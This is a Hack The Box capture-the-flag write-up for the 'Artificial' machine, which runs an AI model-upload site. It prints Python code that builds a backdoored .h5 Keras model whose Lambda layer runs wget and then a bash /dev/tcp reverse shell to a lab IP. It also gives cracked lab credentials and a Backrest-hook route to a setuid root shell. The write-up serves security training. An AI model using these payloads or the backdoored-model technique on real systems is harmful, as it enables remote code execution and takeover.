Artificial (HTB)

I forgot the I

Intro

Hello my fellows today we back with new Hack the box let's get right into it.

Scanning

Port scanning

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNABz8gRtjOqG4+jUCJb2NFlaw1auQlaXe1/+I+BhqrriREBnu476PNw6mFG9ifT57WWE/qvAZQFYRvPupReMJD4C3bE3fSLbXAoP03+7JrZkNmPRpVetRjUwP1acu7golA8MnPGzGa2UW38oK/TnkJDlZgRpQq/7DswCr38IPxvHNO/15iizgOETTTEU8pMtUm/ISNQfPcGLGc0x5hWxCPbu75OOOsPt2vA2qD4/sb9bDCOR57bAt4i+WEqp7Ri/act+f4k6vypm1sebNXeYaKapw+W83en2LnJOU0lsdhJiAPKaD/srZRZKOR0bsPcKOqLWQR/A6Yy3iRE8fcKXzfbhYbLUiXZzuUJoEMW33l8uHuAza57PdiMFnKqLQ6LBfwYs64Q3v8oAn5O7upCI/nDQ6raclTSigAKpPbliaL0HE/P7UhNacrGE7Gsk/FwADiXgEAseTn609wBnLzXyhLzLb4UVu9yFRWITkYQ6vq4ZqsiEnAsur/jt8WZY6MQ8=
|   256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOdlb8oU9PsHX8FEPY7DijTkQzsjeFKFf/xgsEav4qedwBUFzOetbfQNn3ZrQ9PMIHrguBG+cXlA2gtzK4NPohU=
|   256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH8QL1LMgQkZcpxuylBjhjosiCxcStKt8xOBU0TjCNmD
80/tcp   open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
8000/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Classical machine let's check what is the web site contains.

Port 80.

So this seems as an AI website which is make sense since the machine name is artificial.

After login we can see this uploading page.

So when we try to upload anything it will allow us to upload h5 files only.

h5 files are a Hierarchical Data Format 5 (HDF5) file, an open, versatile file format designed for storing and managing large, complex datasets, particularly in scientific and engineering domains

So this is cool. I wanted first to test file bypass this uploading restirction but i came accross this while i was looking about the h5 files.

Bosch AI Shield Vulnerability Report 2 | HiddenLayer | Security for AIHiddenLayer | Security for AI

This basically highlight a vulnerability in how one of the libraries De-serialization Untrusted data. So i decide to give it a shot and see if this module is vulnerable or not.

i decide to test with this payload first

import tensorflow as tf

def example_payload(*args, **kwargs):
    try:
        import os
        os.system("wget http://10.10.11.50:8000/somethionm > /dev/null 2>&1")
        return 10
    except:
        pass
    return 10

num_classes = 10
input_shape = (28, 28, 1)

model = tf.keras.Sequential([
    tf.keras.Input(shape=input_shape),
    tf.keras.layers.Lambda(example_payload, name="custom")
])

model.save("backdoored.h5", save_format="h5")

And it actually work.

So i tried to get a reverse shell. using the normal system module but it connect but and it last for few seconds and disconnect i thought it due on how the process is started and will shudown once the module stop execution of my file so i tried using subprocess to run the process independent.

import tensorflow as tf

def example_payload(*args, **kwargs):
    try:    
        import subprocess
        subprocess.Popen(
                [
                    "bash",
                    "-c",
                    "sh -i >& /dev/tcp/10.10.16.50/9001 0>&1"
                    ],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
                start_new_session=True  
                )
        return 10
    except:
        pass
    return 10

num_classes = 10
input_shape = (28, 28, 1)

model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(example_payload, name="custom")])

model.save("backdoored.h5", save_format="h5")

and this work just fine.

After we got access to the machine under the instance folder we can find the db file using sqlite3 we can open the file there are two tables model , user . we can find the other user on the system gael .

Shell as gael

After we got his password using hash-identifier we can see its an md5 hash. and using john we can easily crack it.

gael:mattp005numbertwo

Shell as root.

As for root shell is also quite simple. When we get into the machine i check the sudo -l command but no privileges was there. Then i checked the id command there is a group called sysadm so i used the following command to search for file that has a group of sysadm and i found this.

So this is a backup file for the backrest.

Backrest is a web-accessible backup solution built on top of restic. Backrest provides a WebUI which wraps the restic CLI and makes it easy to create repos, browse snapshots, and restore files. Additionally, Backrest can run in the background and take an opinionated approach to scheduling snapshots and orchestrating repo health operations

And we can see the service running on port 9898. using ssh port forwarding we can check the website.

ssh -L 9898:127.0.0.1:9898 gael@artificial.htb

Then I download this file into the my machine and i ran this command to open it. using tar

tar -xvf backrest_backup.tar.gz 

After i open it under .config we can see the configuration file that hold the username and the password for the login.

Note: The password is encoded using Base64 encoding so make sure to decode it before crack it.

The password will look like this.

$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO

using john we can crack it.

!@#$%^

Now that we know the username and the password let's log there and check what we can do.,

I created this repo and notice the hook i added.

This hook will grant us root shell in any case whether it succses or fails. Once i done this. we can navigate into it.

And when click this your bash should be there with sudo bit. using this command

./bash -p 

will grant you the root shell you should use the -p as in normal Linux system it will drop the permissions so -p will for not to do so.

So here we are a root. That's about it thank you for reading the do not forget to clean the sudo bit file after you done. 💑.